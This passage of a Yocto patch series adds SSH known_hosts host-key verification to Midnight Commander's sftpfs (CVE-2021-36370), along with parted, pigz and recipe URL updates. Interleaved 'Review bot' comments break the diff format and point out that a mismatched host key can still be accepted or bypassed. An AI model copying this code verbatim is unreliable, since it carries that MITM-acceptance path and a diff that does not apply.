++ sftpfs_super->ip_address = NULL; ++ } ++ ++ if (sftpfs_super->ip_address == NULL) ++ { ++ mc_propagate_error (mcerror, 0, "%s", ++ _("sftp: failed to convert remote host IP address into text form")); ++ my_socket = LIBSSH2_INVALID_SOCKET; ++ goto ret; ++ } ++ + my_socket = socket (curr_res->ai_family, curr_res->ai_socktype, curr_res->ai_protocol); + + if (my_socket < 0) +@@ -161,8 +217,358 @@ sftpfs_open_socket (struct vfs_s_super *super, GError ** mcerror) + } + + /* --------------------------------------------------------------------------------------------- */ ++ ++/** ++ * Read ~/.ssh/known_hosts file. ++ * ++ * @param super connection data ++ * @param mcerror pointer to the error handler ++ * @return TRUE on success, FALSE otherwise ++ * ++ * Thanks the Curl project for the code used in this function. 
++ */ ++static gboolean ++sftpfs_read_known_hosts (struct vfs_s_super *super, GError ** mcerror) ++{ ++ sftpfs_super_t *sftpfs_super = SFTP_SUPER (super); ++ struct libssh2_knownhost *store = NULL; ++ int rc; ++ gboolean found = FALSE; ++ ++ sftpfs_super->known_hosts = libssh2_knownhost_init (sftpfs_super->session); ++ if (sftpfs_super->known_hosts == NULL) ++ goto err; ++ ++ sftpfs_super->known_hosts_file = ++ mc_build_filename (mc_config_get_home_dir (), ".ssh", "known_hosts", (char *) NULL); ++ rc = libssh2_knownhost_readfile (sftpfs_super->known_hosts, sftpfs_super->known_hosts_file, ++ LIBSSH2_KNOWNHOST_FILE_OPENSSH); ++ if (rc > 0) ++ { ++ const char *kh_name_end = NULL; ++ ++ while (!found && libssh2_knownhost_get (sftpfs_super->known_hosts, &store, store) == 0) ++ { ++ /* For non-standard ports, the name will be enclosed in ++ * square brackets, followed by a colon and the port */ ++ if (store == NULL) ++ continue; ++ ++ if (store->name == NULL) ++ found = TRUE; ++ else if (store->name[0] != '[') ++ found = strcmp (store->name, super->path_element->host) == 0; ++ else ++ { ++ int port; ++ ++ kh_name_end = strstr (store->name, "]:"); ++ if (kh_name_end == NULL) ++ /* Invalid host pattern */ ++ continue; ++ ++ port = (int) g_ascii_strtoll (kh_name_end + 2, NULL, 10); ++ if (port == super->path_element->port) ++ { ++ size_t kh_name_size; ++ ++ kh_name_size = strlen (store->name) - 1 - strlen (kh_name_end); ++ found = strncmp (store->name + 1, super->path_element->host, kh_name_size) == 0; ++ } ++ } ++ } ++ } ++ ++ if (found) ++ { ++ int mask; ++ const char *hostkey_method = NULL; ++ ++ mask = store->typemask & LIBSSH2_KNOWNHOST_KEY_MASK; ++ ++ switch (mask) ++ { ++#ifdef LIBSSH2_KNOWNHOST_KEY_ED25519 ++ case LIBSSH2_KNOWNHOST_KEY_ED25519: ++ hostkey_method = hostkey_method_ssh_ed25519; ++ break; ++#endif ++#ifdef LIBSSH2_KNOWNHOST_KEY_ECDSA_521 ++ case LIBSSH2_KNOWNHOST_KEY_ECDSA_521: ++ hostkey_method = hostkey_method_ssh_ecdsa_521; ++ break; ++#endif 
++#ifdef LIBSSH2_KNOWNHOST_KEY_ECDSA_384 ++ case LIBSSH2_KNOWNHOST_KEY_ECDSA_384: ++ hostkey_method = hostkey_method_ssh_ecdsa_384; ++ break; ++#endif ++#ifdef LIBSSH2_KNOWNHOST_KEY_ECDSA_256 ++ case LIBSSH2_KNOWNHOST_KEY_ECDSA_256: ++ hostkey_method = hostkey_method_ssh_ecdsa_256; ++ break; ++#endif ++ case LIBSSH2_KNOWNHOST_KEY_SSHRSA: ++ hostkey_method = hostkey_method_ssh_rsa; ++ break; ++ case LIBSSH2_KNOWNHOST_KEY_SSHDSS: ++ hostkey_method = hostkey_method_ssh_dss; ++ break; ++ case LIBSSH2_KNOWNHOST_KEY_RSA1: ++ mc_propagate_error (mcerror, 0, "%s", ++ _("sftp: found host key of unsupported type: RSA1")); ++ return FALSE; ++ default: ++ mc_propagate_error (mcerror, 0, "%s %d", _("sftp: unknown host key type:"), mask); ++ return FALSE; ++ } ++ ++ rc = libssh2_session_method_pref (sftpfs_super->session, LIBSSH2_METHOD_HOSTKEY, ++ hostkey_method); ++ if (rc < 0) ++ goto err; ++ } ++ ++ return TRUE; ++ ++ err: ++ { ++ int sftp_errno; ++ ++ sftp_errno = libssh2_session_last_errno (sftpfs_super->session); ++ sftpfs_ssherror_to_gliberror (sftpfs_super, sftp_errno, mcerror); ++ } ++ return FALSE; ++} ++ ++/* --------------------------------------------------------------------------------------------- */ ++ ++/** ++ * Write new host + key pair to the ~/.ssh/known_hosts file. ++ * ++ * @param super connection data ++ * @param remote_key he key for the remote host ++ * @param remote_key_len length of @remote_key ++ * @param type_mask info about format of host name, key and key type ++ * @return 0 on success, regular libssh2 error code otherwise ++ * ++ * Thanks the Curl project for the code used in this function. 
++ */ ++static int ++sftpfs_update_known_hosts (struct vfs_s_super *super, const char *remote_key, size_t remote_key_len, ++ int type_mask) ++{ ++ sftpfs_super_t *sftpfs_super = SFTP_SUPER (super); ++ int rc; ++ ++ /* add this host + key pair */ ++ rc = libssh2_knownhost_addc (sftpfs_super->known_hosts, super->path_element->host, NULL, ++ remote_key, remote_key_len, NULL, 0, type_mask, NULL); ++ if (rc < 0) ++ return rc; ++ ++ /* write the entire in-memory list of known hosts to the known_hosts file */ ++ rc = libssh2_knownhost_writefile (sftpfs_super->known_hosts, sftpfs_super->known_hosts_file, ++ LIBSSH2_KNOWNHOST_FILE_OPENSSH); ++ ++ if (rc < 0) ++ return rc; ++ ++ (void) message (D_NORMAL, _("Information"), ++ _("Permanently added\n%s (%s)\nto the list of known hosts."), ++ super->path_element->host, sftpfs_super->ip_address); ++ ++ return 0; ++} ++ ++/* --------------------------------------------------------------------------------------------- */ ++/** ++ * Compute and return readable host key fingerprint hash. ++ * ++ * @param session libssh2 session handle ++ * @return pointer to static buffer on success, NULL otherwise ++ */ ++static const char * ++sftpfs_compute_fingerprint_hash (LIBSSH2_SESSION * session) ++{ ++ static char result[SHA1_DIGEST_LENGTH * 3 + 1]; /* "XX:" for each byte, and EOL */ ++ const char *fingerprint; ++ size_t i; ++ ++ /* The fingerprint points to static storage (!), don't free() it. 
*/ ++ fingerprint = libssh2_hostkey_hash (session, LIBSSH2_HOSTKEY_HASH_SHA1); ++ if (fingerprint == NULL) ++ return NULL; ++ ++ for (i = 0; i < SHA1_DIGEST_LENGTH && i * 3 < sizeof (result) - 1; i++) ++ g_snprintf ((gchar *) (result + i * 3), 4, "%02x:", (guint8) fingerprint[i]); ++ ++ /* remove last ":" */ ++ result[i * 3 - 1] = '\0'; ++ ++ return result; ++} ++ ++/* --------------------------------------------------------------------------------------------- */ ++ + /** +- * Recognize authenticaion types supported by remote side and filling internal 'super' structure by ++ * Process host info found in ~/.ssh/known_hosts file. ++ * ++ * @param super connection data ++ * @param mcerror pointer to the error handler ++ * @return TRUE on success, FALSE otherwise ++ * ++ * Thanks the Curl project for the code used in this function. ++ */ ++static gboolean ++sftpfs_process_known_host (struct vfs_s_super *super, GError ** mcerror) ++{ ++ sftpfs_super_t *sftpfs_super = SFTP_SUPER (super); ++ const char *remote_key; ++ const char *key_type; ++ const char *fingerprint_hash; ++ size_t remote_key_len = 0; ++ int remote_key_type = LIBSSH2_HOSTKEY_TYPE_UNKNOWN; ++ int keybit = 0; ++ struct libssh2_knownhost *host = NULL; ++ int rc; ++ char *msg = NULL; ++ gboolean handle_query = FALSE; ++ ++ remote_key = libssh2_session_hostkey (sftpfs_super->session, &remote_key_len, &remote_key_type); ++ if (remote_key == NULL || remote_key_len == 0 ++ || remote_key_type == LIBSSH2_HOSTKEY_TYPE_UNKNOWN) ++ { ++ mc_propagate_error (mcerror, 0, "%s", _("sftp: cannot get the remote host key")); ++ return FALSE; ++ } ++ ++ switch (remote_key_type) ++ { ++ case LIBSSH2_HOSTKEY_TYPE_RSA: ++ keybit = LIBSSH2_KNOWNHOST_KEY_SSHRSA; ++ key_type = "RSA"; ++ break; ++ case LIBSSH2_HOSTKEY_TYPE_DSS: ++ keybit = LIBSSH2_KNOWNHOST_KEY_SSHDSS; ++ key_type = "DSS"; ++ break; ++#ifdef LIBSSH2_HOSTKEY_TYPE_ECDSA_256 ++ case LIBSSH2_HOSTKEY_TYPE_ECDSA_256: ++ keybit = LIBSSH2_KNOWNHOST_KEY_ECDSA_256; ++ 
key_type = "ECDSA"; ++ break; ++#endif ++#ifdef LIBSSH2_HOSTKEY_TYPE_ECDSA_384 ++ case LIBSSH2_HOSTKEY_TYPE_ECDSA_384: ++ keybit = LIBSSH2_KNOWNHOST_KEY_ECDSA_384; ++ key_type = "ECDSA"; ++ break; ++#endif ++#ifdef LIBSSH2_HOSTKEY_TYPE_ECDSA_521 ++ case LIBSSH2_HOSTKEY_TYPE_ECDSA_521: ++ keybit = LIBSSH2_KNOWNHOST_KEY_ECDSA_521; ++ key_type = "ECDSA"; ++ break; ++#endif ++#ifdef LIBSSH2_HOSTKEY_TYPE_ED25519 ++ case LIBSSH2_HOSTKEY_TYPE_ED25519: ++ keybit = LIBSSH2_KNOWNHOST_KEY_ED25519; ++ key_type = "ED25519"; ++ break; ++#endif ++ default: ++ mc_propagate_error (mcerror, 0, "%s", ++ _("sftp: unsupported key type, can't check remote host key")); ++ return FALSE; ++ } ++ ++ fingerprint_hash = sftpfs_compute_fingerprint_hash (sftpfs_super->session); ++ if (fingerprint_hash == NULL) ++ { ++ mc_propagate_error (mcerror, 0, "%s", _("sftp: can't compute host key fingerprint hash")); ++ return FALSE; ++ } ++ ++ rc = libssh2_knownhost_checkp (sftpfs_super->known_hosts, super->path_element->host, ++ super->path_element->port, remote_key, remote_key_len, ++ LIBSSH2_KNOWNHOST_TYPE_PLAIN | LIBSSH2_KNOWNHOST_KEYENC_RAW | ++ keybit, &host); ++ ++ switch (rc) ++ { ++ default: ++ case LIBSSH2_KNOWNHOST_CHECK_FAILURE: ++ /* something prevented the check to be made */ ++ goto err; ++ ++ case LIBSSH2_KNOWNHOST_CHECK_MATCH: ++ /* host + key pair matched -- OK */ ++ break; ++ ++ case LIBSSH2_KNOWNHOST_CHECK_NOTFOUND: ++ /* no host match was found -- add it to the known_hosts file */ ++ msg = g_strdup_printf (_("The authenticity of host\n%s (%s)\ncan't be established!\n" ++ "%s key fingerprint hash is\nSHA1:%s.\n" ++ "Do you want to add it to the list of known hosts and continue connecting?"), ++ super->path_element->host, sftpfs_super->ip_address, ++ key_type, fingerprint_hash); ++ /* Select "No" initially */ ++ query_set_sel (2); ++ rc = query_dialog (_("Warning"), msg, D_NORMAL, 3, _("&Yes"), _("&Ignore"), _("&No")); ++ g_free (msg); ++ handle_query = TRUE; ++ break; ++ ++ case 
LIBSSH2_KNOWNHOST_CHECK_MISMATCH: ++ msg = g_strdup_printf (_("%s (%s)\nis found in the list of known hosts but\n" ++ "KEYS DO NOT MATCH! THIS COULD BE A MITM ATTACK!\n" ++ "Are you sure you want to add it to the list of known hosts and continue connecting?"), ++ super->path_element->host, sftpfs_super->ip_address); ++ /* Select "No" initially */ ++ query_set_sel (2); ++ rc = query_dialog (MSG_ERROR, msg, D_ERROR, 3, _("&Yes"), _("&Ignore"), _("&No")); ++ g_free (msg); ++ handle_query = TRUE; ++ break; ++ } ++ ++ if (handle_query) ++ switch (rc) ++ { ++ case 0: ++ /* Yes: add this host + key pair, continue connecting */ ++ if (sftpfs_update_known_hosts (super, remote_key, remote_key_len, ++ LIBSSH2_KNOWNHOST_TYPE_PLAIN ++ | LIBSSH2_KNOWNHOST_KEYENC_RAW | keybit) < 0) ++ goto err; ++ break; ++ case 1: ++ /* Ignore: do not add this host + key pair, continue connecting anyway */ ++ break; ++ case 2: ++ default: ++ mc_propagate_error (mcerror, 0, "%s", _("sftp: host key verification failed")); ++ /* No: abort connection */ ++ goto err; ++ } ++ ++ return TRUE; ++ ++ err: ++ { ++ int sftp_errno; ++ ++ sftp_errno = libssh2_session_last_errno (sftpfs_super->session); ++ sftpfs_ssherror_to_gliberror (sftpfs_super, sftp_errno, mcerror); ++ } ++ ++ return FALSE; ++} ++ ++/* --------------------------------------------------------------------------------------------- */ ++/** ++ * Recognize authentication types supported by remote side and filling internal 'super' structure by + * proper enum's values. + * + * @param super connection data +@@ -461,6 +867,9 @@ sftpfs_open_connection (struct vfs_s_super *super, GError ** mcerror) + if (sftpfs_super->session == NULL) + return (-1); + ++ if (!sftpfs_read_known_hosts (super, mcerror)) ++ return (-1); ++ + /* ... start it up. 
This will trade welcome banners, exchange keys, + * and setup crypto, compression, and MAC layers + */ +@@ -475,13 +884,8 @@ sftpfs_open_connection (struct vfs_s_super *super, GError ** mcerror) + return (-1); + } + +- /* At this point we havn't yet authenticated. The first thing to do +- * is check the hostkey's fingerprint against our known hosts Your app +- * may have it hard coded, may go to a file, may present it to the +- * user, that's your call +- */ +- sftpfs_super->fingerprint = +- libssh2_hostkey_hash (sftpfs_super->session, LIBSSH2_HOSTKEY_HASH_SHA1); ++ if (!sftpfs_process_known_host (super, mcerror)) ++ return (-1); + + if (!sftpfs_recognize_auth_types (super)) + { +@@ -538,7 +942,13 @@ sftpfs_close_connection (struct vfs_s_super *super, const char *shutdown_message + sftpfs_super->agent = NULL; + } + +- sftpfs_super->fingerprint = NULL; ++ if (sftpfs_super->known_hosts != NULL) ++ { ++ libssh2_knownhost_free (sftpfs_super->known_hosts); ++ sftpfs_super->known_hosts = NULL; ++ } ++ ++ MC_PTR_FREE (sftpfs_super->known_hosts_file); + + if (sftpfs_super->session != NULL) + { +diff --git a/src/vfs/sftpfs/internal.h b/src/vfs/sftpfs/internal.h +index 5616fb8990..643ce5e3cc 100644 +--- a/src/vfs/sftpfs/internal.h ++++ b/src/vfs/sftpfs/internal.h +@@ -42,6 +42,9 @@ typedef struct + sftpfs_auth_type_t auth_type; + sftpfs_auth_type_t config_auth_type; + ++ LIBSSH2_KNOWNHOSTS *known_hosts; ++ char *known_hosts_file; ++ + LIBSSH2_SESSION *session; + LIBSSH2_SFTP *sftp_session; + +@@ -51,7 +54,7 @@ typedef struct + char *privkey; + + int socket_handle; +- const char *fingerprint; ++ const char *ip_address; + vfs_path_element_t *original_connection_info; + } sftpfs_super_t; + diff --git a/meta/recipes-extended/mc/mc_4.8.26.bb b/meta/recipes-extended/mc/mc_4.8.26.bb index 5c5e6790d8..906778400e 100644 --- a/meta/recipes-extended/mc/mc_4.8.26.bb +++ b/meta/recipes-extended/mc/mc_4.8.26.bb 
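Review bot: In sftpfs_process_known_host the `LIBSSH2_KNOWNHOST_CHECK_MISMATCH` case shares the three-button dialog with `LIBSSH2_KNOWNHOST_CHECK_NOTFOUND`, so a changed host key can still be accepted with "Yes" or bypassed with "Ignore". For a mismatch I would fail closed, as OpenSSH does under strict host key checking, with `mc_propagate_error (mcerror, 0, "%s", _("sftp: host key verification failed")); return FALSE;`, and leave removal of the stale entry to the user. The write path also drops the port: `libssh2_knownhost_checkp` is given `super->path_element->port`, but `libssh2_knownhost_addc` in sftpfs_update_known_hosts stores the bare `super->path_element->host`, so a key accepted on a non-standard port appears to be recorded for the host as a whole. Both behaviours come from the upstream commit, so any change would need to land upstream rather than in this backport.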
@@ -11,6 +11,8 @@ RRECOMMENDS_${PN} = "ncurses-terminfo" SRC_URI = "http://www.midnight-commander.org/downloads/${BPN}-${PV}.tar.bz2 \ file://0001-mc-replace-perl-w-with-use-warnings.patch \ file://nomandate.patch \ + file://CVE-2021-36370.patch \ + file://0001-Ticket-4200-fix-FTBFS-with-ncurses-build-with-disabl.patch \ " SRC_URI[sha256sum] = "9d6358d0a351a455a1410aab57f33b6b48b0fcf31344b9a10b0ff497595979d1" @@ -23,7 +25,9 @@ PACKAGECONFIG ??= "" PACKAGECONFIG[smb] = "--enable-vfs-smb,--disable-vfs-smb,samba," PACKAGECONFIG[sftp] = "--enable-vfs-sftp,--disable-vfs-sftp,libssh2," -CFLAGS_append_libc-musl = ' -DNCURSES_WIDECHAR=1 ' +# enable NCURSES_WIDECHAR=1 only if ENABLE_WIDEC has not been explicitly disabled (e.g. by the distro config). +# When compiling against the ncurses library, NCURSES_WIDECHAR needs to explicitly set to 0 in this case. +CFLAGS_append_libc-musl = "${@' -DNCURSES_WIDECHAR=1' if bb.utils.to_boolean((d.getVar('ENABLE_WIDEC') or 'True')) else ' -DNCURSES_WIDECHAR=0'}" EXTRA_OECONF = "--with-screen=ncurses --without-gpm-mouse --without-x --disable-configure-args" CACHED_CONFIGUREVARS += "ac_cv_path_PERL='/usr/bin/env perl'" diff --git a/meta/recipes-extended/net-tools/net-tools_2.10.bb b/meta/recipes-extended/net-tools/net-tools_2.10.bb index de4a715971..2dafe96356 100644 --- a/meta/recipes-extended/net-tools/net-tools_2.10.bb +++ b/meta/recipes-extended/net-tools/net-tools_2.10.bb @@ -7,7 +7,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263 \ file://ifconfig.c;beginline=11;endline=15;md5=d1ca372080ad5401e23ca0afc35cf9ba" SRCREV = "80d7b95067f1f22fece9537dea6dff53081f4886" -SRC_URI = "git://git.code.sf.net/p/net-tools/code;protocol=https \ +SRC_URI = "git://git.code.sf.net/p/net-tools/code;protocol=https;branch=master \ file://net-tools-config.h \ file://net-tools-config.make \ file://Add_missing_headers.patch \ 
diff --git a/meta/recipes-extended/newt/libnewt_0.52.21.bb b/meta/recipes-extended/newt/libnewt_0.52.21.bb index 88b4cf4a03..3d35a17c92 100644 --- a/meta/recipes-extended/newt/libnewt_0.52.21.bb +++ b/meta/recipes-extended/newt/libnewt_0.52.21.bb @@ -29,7 +29,7 @@ SRC_URI[sha256sum] = "265eb46b55d7eaeb887fca7a1d51fe115658882dfe148164b6c49fccac S = "${WORKDIR}/newt-${PV}" -inherit autotools-brokensep python3native python3-dir +inherit autotools-brokensep python3native python3-dir python3targetconfig EXTRA_OECONF = "--without-tcl --with-python" diff --git a/meta/recipes-extended/parted/files/check-vfat.patch b/meta/recipes-extended/parted/files/check-vfat.patch new file mode 100644 index 0000000000..c64130a4e2 --- /dev/null +++ b/meta/recipes-extended/parted/files/check-vfat.patch 
@@ -0,0 +1,51 @@ +Add checks for both mkfs.vfat and the vfat file system in the kernel before +running tests. + +Upstream-Status: Pending +Signed-off-by: Ross Burton <ross.burton@arm.com> + +diff --git a/tests/t-lib-helpers.sh b/tests/t-lib-helpers.sh +index 4c6c75f..2cc7577 100644 +--- a/tests/t-lib-helpers.sh ++++ b/tests/t-lib-helpers.sh +@@ -418,3 +418,13 @@ require_64bit_() + ;; + esac + } ++ ++# Check if the specified filesystem is either built into the kernel, or can be loaded ++# as a module ++# Usage: has_filesystem vfat ++# Ruturns 0 if the filesystem is available, otherwise skips the test ++require_filesystem_() ++{ ++ grep -q $1 /proc/filesystems && return 0 ++ modprobe --quiet --dry-run $1 || skip_ "this test requires kernel support for $1" ++} +diff --git a/tests/t1100-busy-label.sh b/tests/t1100-busy-label.sh +index f1a13df..0f47b08 100755 +--- a/tests/t1100-busy-label.sh ++++ b/tests/t1100-busy-label.sh +@@ -19,6 +19,9 @@ + . "${srcdir=.}/init.sh"; path_prepend_ ../parted + require_root_ + require_scsi_debug_module_ ++require_fat_ ++require_filesystem_ vfat ++ + ss=$sector_size_ + + scsi_debug_setup_ sector_size=$ss dev_size_mb=90 > dev-name || +diff --git a/tests/t1101-busy-partition.sh b/tests/t1101-busy-partition.sh +index e35e6f0..c813848 100755 +--- a/tests/t1101-busy-partition.sh ++++ b/tests/t1101-busy-partition.sh +@@ -22,6 +22,8 @@ test "$VERBOSE" = yes && parted --version + + require_root_ + require_scsi_debug_module_ ++require_fat_ ++require_filesystem_ vfat + + # create memory-backed device + scsi_debug_setup_ dev_size_mb=80 > dev-name || diff --git a/meta/recipes-extended/parted/files/run-ptest b/meta/recipes-extended/parted/files/run-ptest index 374f1bfbc9..c3d6fca339 100644 --- a/meta/recipes-extended/parted/files/run-ptest +++ b/meta/recipes-extended/parted/files/run-ptest 
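Review bot: In the new `require_filesystem_` helper added to tests/t-lib-helpers.sh, `grep -q $1 /proc/filesystems` is an unquoted substring match, so an argument such as `fat` would be satisfied by the `vfat` line and the test would run without the filesystem it asked for. Quote the argument and match whole words in both commands: `grep -qw -- "$1" /proc/filesystems && return 0` and `modprobe --quiet --dry-run "$1" || skip_ "this test requires kernel support for $1"`. The header comment also names the function `has_filesystem` and spells "Ruturns"; it should read `# Usage: require_filesystem_ vfat` and `# Returns 0 if the filesystem is available, otherwise skips the test`. `require_fat_`, which both test scripts now call, is not defined in the visible hunks, so it is presumably an existing helper.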
@@ -2,6 +2,6 @@ mkdir -p /etc/udev/mount.blacklist.d echo /dev/sda1 >> /etc/udev/mount.blacklist.d/parted-tmp -rm -f *.log +rm -f tests/*.log make -C tests test-suite.log rm /etc/udev/mount.blacklist.d/parted-tmp diff --git a/meta/recipes-extended/parted/parted_3.4.bb b/meta/recipes-extended/parted/parted_3.4.bb index c15f5aeb0b..4260f3a0d4 100644 --- a/meta/recipes-extended/parted/parted_3.4.bb +++ b/meta/recipes-extended/parted/parted_3.4.bb @@ -11,6 +11,7 @@ SRC_URI = "${GNU_MIRROR}/parted/parted-${PV}.tar.xz \ file://fix-doc-mandir.patch \ file://0002-libparted_fs_resize-link-against-libuuid-explicitly-.patch \ file://run-ptest \ + file://check-vfat.patch \ " SRC_URI[md5sum] = "357d19387c6e7bc4a8a90fe2d015fe80" @@ -35,10 +36,13 @@ do_install_ptest() { cp ${S}/build-aux/test-driver $t/build-aux/ cp -r ${S}/tests $t cp ${B}/tests/Makefile $t/tests/ + mkdir $t/lib + cp ${B}/lib/config.h $t/lib sed -i "s|^VERSION.*|VERSION = ${PV}|g" $t/tests/Makefile sed -i "s|^srcdir =.*|srcdir = \.|g" $t/tests/Makefile sed -i "s|^abs_srcdir =.*|abs_srcdir = \.|g" $t/tests/Makefile - sed -i "s|^abs_top_srcdir =.*|abs_top_srcdir = \.\.|g" $t/tests/Makefile + sed -i "s|^abs_top_srcdir =.*|abs_top_srcdir = "${PTEST_PATH}"|g" $t/tests/Makefile + sed -i "s|^abs_top_builddir =.*|abs_top_builddir = "${PTEST_PATH}"|g" $t/tests/Makefile sed -i "s|^Makefile:.*|Makefile:|g" $t/tests/Makefile sed -i "/^BUILDINFO.*$/d" $t/tests/Makefile for i in print-align print-max print-flags dup-clobber duplicate fs-resize; \ 
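Review bot: In the do_install_ptest hunk of parted_3.4.bb, the two new sed lines close the double-quoted script before `${PTEST_PATH}` and reopen it afterwards, so the expanded path reaches the shell unquoted. It works while the path has no whitespace, but it reads like a quoting mistake and differs from the neighbouring sed lines. Keeping the variable inside the quotes is equivalent and clearer: `sed -i "s|^abs_top_srcdir =.*|abs_top_srcdir = ${PTEST_PATH}|g" $t/tests/Makefile`, and the same for `abs_top_builddir`. The function body continues past the end of this hunk.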
@@ -47,8 +51,8 @@ do_install_ptest() { sed -e 's| ../parted||' -i $t/tests/*.sh } -RDEPENDS_${PN}-ptest = "bash coreutils perl util-linux-losetup python3 make gawk e2fsprogs-mke2fs python3-core" -RRECOMMENDS_${PN}-ptest = "kernel-module-scsi-debug" +RDEPENDS_${PN}-ptest = "bash coreutils perl util-linux-losetup util-linux-mkswap python3 make gawk e2fsprogs-mke2fs e2fsprogs-tune2fs python3-core dosfstools" +RRECOMMENDS_${PN}-ptest += "kernel-module-scsi-debug kernel-module-loop kernel-module-vfat" RDEPENDS_${PN}-ptest_append_libc-glibc = "\ glibc-utils \ locale-base-en-us \ diff --git a/meta/recipes-extended/pigz/files/0001-Fix-bug-when-combining-l-with-d.patch b/meta/recipes-extended/pigz/files/0001-Fix-bug-when-combining-l-with-d.patch new file mode 100644 index 0000000000..9c301f2054 --- /dev/null +++ b/meta/recipes-extended/pigz/files/0001-Fix-bug-when-combining-l-with-d.patch 
@@ -0,0 +1,50 @@ +From 65986f3d12d434b9bc428ceb6fcb1f6eeeb2c47d Mon Sep 17 00:00:00 2001 +From: Changqing Li <changqing.li@windriver.com> +Date: Mon, 17 Jan 2022 15:36:56 +0800 +Subject: [PATCH] Fix bug when combining -l with -d. + +Though it makes no sense to do pigz -ld, that is implicit when +doing unpigz -l. This commit fixes a bug for that combination. + +Upstream-Status: Backport [https://github.com/madler/pigz/commit/326bba44aa102c707dd6ebcd2fc3f413b3119db0] + +Signed-off-by: Changqing Li <changqing.li@windriver.com> +--- + pigz.c | 14 +++++++------- + 1 file changed, 7 insertions(+), 7 deletions(-) + +diff --git a/pigz.c b/pigz.c +index f90157f..d648216 100644 +--- a/pigz.c ++++ b/pigz.c +@@ -4007,6 +4007,13 @@ local void process(char *path) { + } + SET_BINARY_MODE(g.ind); + ++ // if requested, just list information about the input file ++ if (g.list && g.decode != 2) { ++ list_info(); ++ load_end(); ++ return; ++ } ++ + // if decoding or testing, try to read gzip header + if (g.decode) { + in_init(); +@@ -4048,13 +4055,6 @@ local void process(char *path) { + } + } + +- // if requested, just list information about input file +- if (g.list) { +- list_info(); +- load_end(); +- return; +- } +- + // create output file out, descriptor outd + if (path == NULL || g.pipeout) { + // write to stdout +-- +2.17.1 + diff --git a/meta/recipes-extended/pigz/pigz_2.6.bb b/meta/recipes-extended/pigz/pigz_2.6.bb index 05be9b733f..5c0aab55a7 100644 --- a/meta/recipes-extended/pigz/pigz_2.6.bb +++ b/meta/recipes-extended/pigz/pigz_2.6.bb 
@@ -8,7 +8,8 @@ SECTION = "console/utils" LICENSE = "Zlib & Apache-2.0" LIC_FILES_CHKSUM = "file://pigz.c;md5=9ae6dee8ceba9610596ed0ada493d142;beginline=7;endline=21" -SRC_URI = "http://zlib.net/${BPN}/fossils/${BP}.tar.gz" +SRC_URI = "http://zlib.net/${BPN}/fossils/${BP}.tar.gz \ + file://0001-Fix-bug-when-combining-l-with-d.patch" SRC_URI[sha256sum] = "2eed7b0d7449d1d70903f2a62cd6005d262eb3a8c9e98687bc8cbb5809db2a7d" PROVIDES_class-native += "gzip-native" diff --git a/meta/recipes-extended/procps/procps_3.3.17.bb b/meta/recipes-extended/procps/procps_3.3.17.bb index c74a901d9a..9fd3db196d 100644 --- a/meta/recipes-extended/procps/procps_3.3.17.bb +++ b/meta/recipes-extended/procps/procps_3.3.17.bb @@ -12,7 +12,7 @@ DEPENDS = "ncurses" inherit autotools gettext pkgconfig update-alternatives -SRC_URI = "git://gitlab.com/procps-ng/procps.git;protocol=https \ +SRC_URI = "git://gitlab.com/procps-ng/procps.git;protocol=https;branch=master \ file://sysctl.conf \ file://0001-w.c-correct-musl-builds.patch \ file://0002-proc-escape.c-add-missing-include.patch \ diff --git a/meta/recipes-extended/psmisc/psmisc_23.4.bb b/meta/recipes-extended/psmisc/psmisc_23.4.bb index 894443f4ef..89fe8a709c 100644 --- a/meta/recipes-extended/psmisc/psmisc_23.4.bb +++ b/meta/recipes-extended/psmisc/psmisc_23.4.bb @@ -2,7 +2,7 @@ require psmisc.inc LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3" -SRC_URI = "git://gitlab.com/psmisc/psmisc.git;protocol=https \ +SRC_URI = "git://gitlab.com/psmisc/psmisc.git;protocol=https;branch=master \ file://0001-Use-UINTPTR_MAX-instead-of-__WORDSIZE.patch \ " SRCREV = "5fab6b7ab385080f1db725d6803136ec1841a15f" diff --git a/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb b/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb index 5aff2b56a6..ad392138b5 100644 --- a/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb +++ b/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb 
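Review bot: The rewritten `SRC_URI` in pigz_2.6.bb still fetches the tarball over plain `http://`, so the pinned `SRC_URI[sha256sum]` is the only thing protecting the download from tampering in transit. Other recipes in this series gain `protocol=https` on their git URLs. If the upstream host serves the same path over TLS, the first line could become `SRC_URI = "https://zlib.net/${BPN}/fossils/${BP}.tar.gz \`. The checksum line should stay as it is either way.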
@@ -19,7 +19,7 @@ PV = "1.4.2" SRCREV = "6f54e54455c073d08a56ea627c6cd2355a40eb53" -SRC_URI = "git://github.com/thkukuk/${BPN} \ +SRC_URI = "git://github.com/thkukuk/${BPN};branch=master;protocol=https \ file://0001-Use-cross-compiled-rpcgen.patch \ " diff --git a/meta/recipes-extended/stress-ng/stress-ng/no_daddr_t.patch b/meta/recipes-extended/stress-ng/stress-ng/no_daddr_t.patch deleted file mode 100644 index dba4494b91..0000000000 --- a/meta/recipes-extended/stress-ng/stress-ng/no_daddr_t.patch +++ /dev/null @@ -1,32 +0,0 @@ -From 55e11765af2bdc8adfac87dab1fb2682f7e6c236 Mon Sep 17 00:00:00 2001 -From: Khem Raj <raj.khem@gmail.com> -Date: Tue, 9 Jun 2020 22:10:28 -0700 -Subject: [PATCH] Define daddr_t if __DADDR_T_TYPE is not defined - -glibc defined daddr_t but musl does not, ideally it should not be used -and simple int type is enough. However, its better to leave glibc behavior -as it is and only define it to int if daddr_t is not provided by libc - -Upstream-Status: Pending - -Signed-off-by: Khem Raj <raj.khem@gmail.com> - ---- - stress-ng.h | 4 ++++ - 1 file changed, 4 insertions(+) - -diff --git a/stress-ng.h b/stress-ng.h -index 1a66293..802dc25 100644 ---- a/stress-ng.h -+++ b/stress-ng.h -@@ -3763,6 +3763,10 @@ struct shim_statx { - uint64_t __spare2[14]; - }; - -+#ifndef __DADDR_T_TYPE -+typedef int daddr_t; -+#endif -+ - /* old ustat struct */ - struct shim_ustat { - #if defined(HAVE_DADDR_T) diff --git a/meta/recipes-extended/stress-ng/stress-ng_0.12.05.bb b/meta/recipes-extended/stress-ng/stress-ng_0.12.05.bb index eb6bdb4a81..3770ba9ae1 100644 --- a/meta/recipes-extended/stress-ng/stress-ng_0.12.05.bb +++ 